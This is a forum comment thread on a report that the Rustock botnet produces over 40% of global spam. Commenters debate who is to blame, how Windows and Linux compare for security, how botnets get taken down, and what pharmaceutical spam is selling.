Rustock Botnet Responsible For 40% of Spam

angry tapir writes "More than 40 percent of the world's spam is coming from a single network of computers that computer security experts continue to battle, according to new statistics from Symantec's MessageLabs' division. The Rustock botnet has shrunk since April, when about 2.5 million computers were infected with its malicious software that sent about 43 billion spam e-mails per day. Much of it is pharmaceutical spam."

Somebody

[bobstreo]

Hunt them down and kill them all
Please

Re:Somebody

[DWMorse]

And then, unplug their computers.

That's... that's what you meant, right?

Re:Somebody

[228e2]

No.

I know its "crazy" to think that not everyone knows how to run a bare bones Linux distro and knows how to block all ports except for 80, 8080, and say 21-23. But believe me when I say that the majority of computer users are incredibly inept when it comes to basic computer security.

Grandma will never be a network admin. Neither will your local elementary school teacher. Just because people run Windows out of the box and have no idea they are harboring an orgy of botnets is it fair to call them criminals.

Re:Somebody

[Anne+Thwacks]

Starting with the pharma companies whose products are being promoted, and the credit card companies who process the transactions.

(They are the low hung fruit.)

Re:Somebody

[WrongSizeGlass]

So because someone is operating technology they are not able to safely use they should be free of reprimand?

The infected systems should be blocked from internet access ... but surely you're not implying that people who aren't technical enough to be a sys or network admins can't own a computer? Would I have to take a test online or at a store before ordering a computer?

Spam causes real financial trouble and being infected either means Windows and therefore Microsoft are at fault, or the user is at fault.

I don't see you pointing a finger at those who start this whole mess: the people writing the virus "packages" for sale, the botnet operators and those who hire them to spew spam, steal bank login information, coordinate DDoS attacks and everything in between.

Someone has to be responsible, if you left the keys to your car in the open and someone took it for a joyride, crashing into a store front and smashing up a bunch of televisions, that's exactly the same as letting someone steal bandwidth and clock cycles for spamming people.

In this analogy those who create and maintain the botnets & spam would be the joyriders ... and once again I don't see you putting any blame on them.

Re:Somebody

[drinkypoo]

All the user needs to do is run Linux on a 64 bit machine so they have proper NX. I'd say OSX but it's still got fake ASLR AFAIK. Problem fucking solved. There's no known Linux-based botnets. They don't have to become a firewalling expert, because there's no dangerous services running by default. For most users Linux+Chrome or Linux+FF would provide a superior experience to what they were using before. Too bad no major vendor advertises it on this basis... or adequately

Re:Somebody

[crow_t_robot]

(They are the low hung fruit.)

Considering what they are selling, they are also the "well hung" fruit.

Re:Somebody

[selven]

I agree with hitting the pharma companies, but the credit card companies? I'd rather have them be neutral providers of monetary exchange services than have them decide what's legitimate and what isn't, just like ISPs should stay out of copyright enforcement.

Re:Somebody

[tibit]

You know what's really interesting in spam? For spam to pass the content filters, especially those based on statistical models of language, it has to have purposeful mistakes inserted all over the place. In the end, a piece of spam typically looks like if a stoned idiot wrote it. But now it seems that people who author the message in the first place became somehow infected by the stoned idiocy of their own messages.

A few months ago I went through 300 non-scamming spam messages in my spam folder, and only managed to get to 5, I repeat, 5 payment screens. That means that most spam is pretty pointless: the websites it points to, if they haven't been left out (happens quite often), are mostly broken so that there's no way to actually pass any money to the spammer, even if you try really hard. Sometimes they superficially look like they may work, but when time comes to actually submit a payment, things are very likely to be broken. I have been testing stuff using virtual credit cards available from my bank, with very low limits -- below that of the payment amount. On a working site, you get some indication that the transaction was declined. In most places, though, there would be internal server errors, javascript errors preventing payment submittal, and all other sorts of problems.

I think that bulk emailing operations are simply around to milk the spammers for money, and only the mailers make any money -- the spammers themselves seem too stupid to get any.

It's quite hilarious.

Re:Somebody

[datapharmer]

There's no known Linux-based botnets

The skill set of those running the linux based botnets is a little higher. It doesn't mean they aren't out there... many routers are infected and run linux just for an example, and there are quite a few rogue webservers out there too. The question for botnet owners really boils down to "do you want to run a 500 strong linux server botnet or a 2.5 million strong Windows/PC botnet?" Given the number of dual and quad core systems on the consumer market I think most would agree the latter is a better ROI.

Re:Somebody

[DrgnDancer]

In the highly unlikely event that every person in the world switched to Linux tomorrow, I guarantee there would be a Linux botnet running in a matter of weeks. Remember that you don't have to "root" a box to get it working as a part of a botnet. Running software, initiating client side network connections, sending e-mail, these are all things that can be done as a regular user. Use a flash vulnerability, or just get the user to run a script (in some ways even easier with an unwary user in Linux, since there is no need for a telltale file extension), install botnet software in a .directory on the user's home, edit their shell start-ups scripts to get it running. Presto, botnet client.

Would it work on you? Probably not. Would it work on a normal user? Especially a normal user who just switched to a new OS and is finding that they know even less about this new system than the little they know about the old system? Absolutely. The chances of such a person even knowing to look in .bashrc for a rogue start up, or how to do an "ls -al" to find an extra hidden directory are minuscule.

Linux is, in general, a more secure OS than Windows in many ways (not as much so as in the past, but still more secure), but a Linux box admined by a complete neophyte in a world where people were actually targeting Linux, would be just as vulnerable as a Windows box being admined by a complete neophyte in a world where people target Windows. In the end, all OSes are vulnerable to the simple fact that normal users must be allowed (at a minimum) to run their software, save their data, and use the network. Take that away, and the computer is little more than an expensive paper weight/space heater combination device. Leave it there and users will find a way to do something stupid.

Re:Somebody

[Lurker2288]

Yeah, go after Pfizer. Because I'm sure it's really them that's putting out all that Viagra spam, and totally not bullshit suppliers of counterfeit drugs.

Seriously, do you have any idea how tightly regulated even direct to consumer drug ads are? There's no way any legitimate company is involved in this. I know it's fun and exciting to blame Big Pharma for everything wrong in life, but how about we stick to the many things they ACTUALLY do wrong, rather than random shit we merely attribute to them?

Pharmaceutical

[Tubal-Cain]

Much of it is pharmaceutical spam.

A very particular kind of pharmaceutical.

Re:Pharmaceutical

[compro01]

My accounts have been getting more offers of narcotics than genital enlargement in the past few months. Also got a few spams selling antibiotics, which is a new one, and even more reprehensible if they're genuine.

Re:Pharmaceutical

[dgatwood]

Why is it worse if they're real? You can buy antibiotics at any vet supply house.... It's not like they're hard to get without a prescription. If they're real, the spam is pretty much noise. If they're not real, then it's bad---people buying something that they think will make them well, only to have it not help them, or worse, poison them....

Re:Pharmaceutical

[compro01]

The spam is offering antibiotics such as linezolid, teicoplanin, daptomycin, and tigecycline, antibiotics that are reserved for highly resistant bacteria ("superbugs" like VRE and MSRA), not the stuff you can get from a veterinarian. These drugs being used inappropriately is a very bad thing.

Voluptuous woman falls over heavy chest

[Spewns]

Make your girl happy with your long and huge meat machine.

*link to .ru website*

Re:Voluptuous woman falls over heavy chest

[Delarth799]

You get text in your emails still?

A vast majority of the ones I get are just a link or someone having a spaz on the keyboard a few times and then a link.
I do occasionally get ones where they try to chop up the words into several parts. Those are the easy ones to filter for.

Re:Voluptuous woman falls over heavy chest

[Nadaka]

I know, I kinda miss the days when my spam folder would be filled with messages that end in a quixotic paragraph that resembles nonsensical poetry.

Oh PAH-LEEEZE

[Frosty+Piss]

First and foremost, don't expect ANY help from the "security" companies like Symantec and the like, SOLVING this problem would mean the end to their extortion business.

And, don't expect ANY help from the "white hats" in general, all they can do is walk in circles pontificating about how it would be unethical to hack these networks and bring them down.

So really, the only solution is the possibility of someone with "black hat" skilz that wants to be paid to take the system down outside the "law".

Re:Oh PAH-LEEEZE

[Nemyst]

Your wording seems to indicate contempt. White hats or security experts unfortunately have their hands tied. They probably know how to take down the botnet, but that involves illegal activity. While the criminals are hampered by no such things, the lawful guys are stuck with it: anything they'd do that would be essentially good would get them jailed.

Re:Oh PAH-LEEEZE

[Yvan256]

So, Lone Star, now you see that evil will always triumph because good is dumb. - Dark Helmet

Re:Oh PAH-LEEEZE

[PatPending]

So really, the only solution is the possibility of someone with "black hat" skilz that wants to be paid to take the system down outside the "law".

Hudson: Let's just bug out and call it even, OK? What are we talking about this for?

Ripley: I say we take off and nuke the entire site from orbit. It's the only way to be sure.

Hudson: Fuckin' A...

Re:Oh PAH-LEEEZE

Still, it's true if you think about it.

Imagine if nearly 90% of cars and trucks on the road dumped trash all over the place when driving around? Those drivers would get a ticket and be required to go to a garage to fix whatever the hell is causing their vehicle to dump trash everywhere.

No such law exists for computers and the internet. And everyone has to suffer because of it.

So, good is dumb because your hands are tied in laws. And evil triumph because we get billions of spam clogging the tubes all over the place.

Re:Oh PAH-LEEEZE

[silentcoder]

That is only partially true. There was a /. story not long ago about a white-hat company that utterly destroyed a botnet. Sorry I can't remember the names which is making googling rather hard.
I do remember the technical details (whose surprised ?). It was a difficult and involved process - the botnet relied on numerous DNS tricks to always be able to find it's control servers. What the white hats did was to trace and track the current set of master servers. Knocking them out wouldn't do any good, as the controllers would just activate a new set and the bots would find them.

Instead they tracked the servers, worked with law enforcement and the ISP's hosting them and got those DNS names rerouted to their own servers - which were running a control server of their own, designed to be a drop-in compatible replacement for the real thing. Result - suddenly the good guys controlled all the bots, and could then actively locate and eradicate the infections (including letters to the owners of the computers and such).
It meant a lot of coordination between many organisations because pulling it off meant a huge bunch of people doing slightly different updates to servers at the exact same time - but it was done, and it shows it CAN be done.

Interestingly I do remember that the company that did it are the new kids in security, a small startup. They don't have any share of the pie that symantec and the like has, so they have no vested interest in keeping botnets alive. Instead they are trying to build a business model on studying, and then actively destroying them.
Trouble is - botnets are like hydra's, as long as there are so many vulnerable machines on the net (e.g. the entire Microsoft Windows customer base) destroying one doesn't do any good - you see a drop in spam for a few days, maybe a week or two, then another botnet has filled in the gap.
The only real way to solve the problem is to remove those deliciously easy targets. We all know exactly how easy that will be.

Re:Oh PAH-LEEEZE

[Raenex]

There was a /. story not long ago about a white-hat company that utterly destroyed a botnet.

If you're thinking if this story, it was a research professor, and the botnet was eventually allowed to be retaken.

Re:Oh PAH-LEEEZE

[Elektroschock]

It is no problem for Government agencies to take extralegal action.

But indeed the core is that people should use Linux and users of infected Windows machines should pay.

So how hard....

Is it to order some of their crap. Track down where the money goes.

And kill them.

We've spent more doing less millions of times... Why don't we get around to fixin this problem?

Re:So how hard....

[ergrthjuyt]

Generally spammers are contracted out or just trying to earn referral commissions - they aren't doing the selling themselves. Also, the money will go international, often to countries that aren't just going to say "OK, here it is" when you ask for the bank info.

anti-spam

[bakamorgan]

Find their ip address and sick 4chan on them maybe then something will get done.

Re:anti-spam

[NevarMore]

Wait, are you proposing that we ENCOURAGE 4chan to take over a botnet of 2.5 million computers?

I'll take the spam thankyouverymuch.

Really?

[scdeimos]

More than 40 percent of the world's spam is coming from a single network of computers

Yes, it's called the internet.

Re:Windows has great anti-malware tech

[robot256]

This is like the corporate/university computers that re-image themselves every night against the central server, deleting anything that changed on the hard disk. That would be an awesome feature for a dumb web-surfing box for the idio---parents. Would be a little bit of a pain for everyone else, but we can avoid getting infected, right?

Re:Question

[ScentCone]

it would seem to me that the pharmaceutical companies that benefit from this ... should have responsibility in the computer crimes taking place here

The overwhelming majority of the "pharmaceutical" ads in questions are fraudulent. They're not actually selling Viagra. They're either selling knockoff placebos, or they're selling nothing at all, because they're just looking for naive suckers to visit a sketchy web site and cough up a credit card number or other details that can be used in identity theft schemes or similar crimes. Merck and the other actual makers of the real products would love nothing more than to shut this crap down.

Friendly Reminder

[DynaSoar]

"Maybe what we need are a few good old fashioned hangings." -- Commissioner Orson Swindell, Federal Trade Commission
  at the first FTC spam conference.

Stiffy In A Jiffy

[soundguy]

The best one I ever received was

Subject: Stiffy In A Jiffy
From: Erection Perfection

Re:Wunna These Days, Alice...

[dgatwood]

No need to destroy their data. All one would have to do is replace key Windows boot files with a script that tells them that their Windows installation is hopelessly infected by viruses and has been disabled, telling them to take it to somebody who actually knows how to properly configure a Windows machine. There's no need to destroy irreplaceable data, merely to wreck Windows so badly that they have to do a full reinstall. Since that is completely beyond any of the sorts of people who are part of the problem, they would be forced to take their computers to somebody for repair, and one would at least hope that a sizable percentage of those machines would come back properly protected from viruses.

Re:Windows has great anti-malware tech

[blueg3]

You can fairly easily set it up so that when machines reboot, all changes are lost. It's convenient for a lot of applications.

Email spam is so passe.

[Psaakyrn]

Now the port scan spams on the other hand.. Sure, I can block them, but the sheer load is causing DoS issues. What can I do about that?

You forgot your tinfoil hat.

[N0Man74]

Companies like Symantec and Norton didn't start off as antivirus companies. They build tools and utilities. If by some miracle all of the botnets, trojans, and virus infections were to vanish from the world, I imagine that they would go back to making tools. It was virus makers that created the market, not Symantec and Norton.

I suppose you think cancer researchers don't really want to find a cure, because then they'd lose their funding, right?

The fact that you are marked as insightful is baffling. You have a distorted sense of reality.

I won't even bother commenting on your "white hats" criticisms, since that's been pretty well covered by others...

However, to say that *your* solution is the only solution is not only short-sighted, it's arrogant. Black Hat "skilz" must be the mystery reason why about half the number of systems are infected now, right?

There isn't a magic bullet solution that will magically fix the problem completely, aside from getting rid of the internet (and maybe humanity too!). It has to be fought on multiple fronts and incorporating multiple solutions to mitigate the problem and hopefully if it's made difficult enough or they have enough that they can lose, then maybe it will stop... but it's much more likely that we're always going to be stuck with it to at least some degree.

Re:Question

[sjames]

If the FBI was half as interested in nailing fraud as it was in doing the RIAA's bidding, they would create fake credit card accounts and order the spamvertized products themselves. Then they can trace the transactions back and get the merchant accounts frozen.

Re:This is why we won't shut up.

[grcumb]

"Us Ubuntu and Mac users will not give you peace nor rest until Windows is dead"

Good luck with that. Of course once OUR Windows is dead it'll be YOUR machines sending us SPAM.

Yeah, you know what? You may be right, but in the mean time...

... Could you please stop making excuses and fix your fucking machines that spam the rest of the world!?!

Because, you see, whatever MY potential for causing YOU harm in the future (and I admit it's non-zero), the likelihood that the overwhelming majority of the millions of machines in this botnet right now are running Windows has a probability of 1. So maybe if WE stopped speculating about some future email Armageddon and focused on the one that's happening right now, we might actually get something done.

And who knows? Maybe the lessons you learn by cleaning up this mess will help us all avoid it in the future? Now wouldn't that be nice?

Nicer than your reply, anyway, which is the rhetorical equivalent of 'Yo' Momma!'

Re:This is why we won't shut up.

[silentcoder]

>Good luck with that. Of course once OUR Windows is dead it'll be YOUR machines sending us SPAM.

No it won't. The "windows gets targeted only because it's biggest" argument is a fallacy - and an easily debunked one at that.

Here's the REAL reason why you will never see much spams or trojans in the Linux world. Unlike our windows counterparts, when we need an app for some task, we don't open a (insecure) browser, search around, find a .exe which we then RUN to install the program.

We connect to a repository, which is run by software experts who have repackaged and tested the programs in question, the software gets downloaded automatically - the files are checked using digital signatures to prevent MitM attacks, and only then installed.

Average computer users will never have the capacity of computer experts to tell trojans from useful apps, and either way have no viable means of determining if a particular install file is trustworthy without having already taken the risk, all while dealing with a browser/email combination that could do all this without them even being aware of it (though at least that has gotten better than it used to - remember I-Love-You, that's how bad Outlook once was!).
Us GNU/Linux users pool our resources to have people who are skilled select and evaluate the apps in our repositories and make our selection from a set that's pre-vetted. We can choose on features and design without having to WORRY about "does it coincidentally install spyware which will later be installing a botnet", because the people who packaged the software have nothing to gain by not removing such, and everything to benefit from ensuring the trustworthiness of the software.

Remove the capacity to write "installer programs" for windows - create a repository (perhaps even a paid one - like Apple's app-store) and you solve the botnet problem. Trouble is, Microsoft unlike the GNU/Linux companies won't find the best way to keep their repo profitable is to be open to all comers who write useful software. Much like Apple, they'll end up using it to make sure nothing i available to their users that competes with their own products.
The cure may be even worse than the disease - so I don't know if it's something to push for. What I can tell you is, as long as ordinary users are supposed to vet good from bad software (people who have ZERO training in how to tell the difference in other words) - botnets WILL proliferate. The problem isn't even so much OS-design (though it plays a role), it's the way software is managed on the two platforms.
GNU/Linux simply has a software management concept that is by it's very nature far, far more secure than Windows. It's not perfect - last year Fedora's repos were pwned temporarily - and they had to create and issue a full set of new keys to ensure the integrity of what they contained - but the problem was fixable without any customer ever being at risk. That's what GNU/Linux's repository concept does - it takes the task of risk assessment and gives it to people who are trained at for the job so by definition they do it better.

Re:Question

[ZERO1ZERO]

Tom: Listen to this one: you open a company called the "Arse Tickler's Faggots Fan Club".

Soap: You what?

Tom: You take out an advert in the back page of some gay mag, advertising the latest in arse-intruding dildos. You sell it with, I dunno, "does what no other dildo can do until now", "the latest and greatest in sexual technology", "guaranteed results or your money back", all that bollocks. Now these dils cost twenty-five quid a pop - that's a snip for the amount of pleasure they're gonna give the recipients. But they send their cheques to the other company name, nothing offensive, er, "Bobbie's Bits" or something, for twenty-five quid. You take that twenty-five quid, you stick it in the bank until it clears. Now, this is the smart bit - you send back the cheque for twenty-five pound from the other company name, "Arse Tickler's Faggots Fan Club", saying we're sorry, we couldn't get the supplies from America because they ran out of stock. Now you see how many people cash that cheque - not a single soul, because who wants their bank manager to know they tickle arse when they're not paying cheques? Bacon: So how long do you have to wait until you see a return?

Tom: Probably no more than four weeks.

Bacon: A month? So, what fucking good is that if we need it in six - no, five days?

Tom: Well, it's still a good idea.

Rooting out cross-border networks of perpetrators?

[D4C5CE]

Our taxes pay agencies boasting their purported capability to do just that. If they let bot-herders proliferate for years, how are they supposed to be more efficient against terrorists not entirely dissimilar in organization (and with the first able to turn into the latter at any time by using/"renting out" their botnets as Weapons of Mass Disruption e.g. for DDoS attacks against critical infrastructures)?

2.5 million Windows computers

[devent]

It's 2.5 million Windows computers that are infected. No Macs, no Linux, no *BDS, no Solaris, no YouNameIt. It would be interesting, how many are Windows XP, Windows Vista or Windows 7.

Hm lets see, 2.5 million Windows computers in one botnet agains 0 Linux computers world wide. I would say Dell was right:

"6) Ubuntu is safer than Microsoft Windows: The vast majority of viruses and spyware written by hackers are not designed to target and attack Linux." from http://www.theregister.co.uk/2010/06/14/dell_ubuntu_windows_security/

Microsoft malicious software removal tool

[Joce640k]

Why isn't the Microsoft malicious software removal thing wiping these botnets out in their millions?

Re:Wunna These Days, Alice...

[dgatwood]

Because statistically speaking, if they have one virus, they probably have thirty.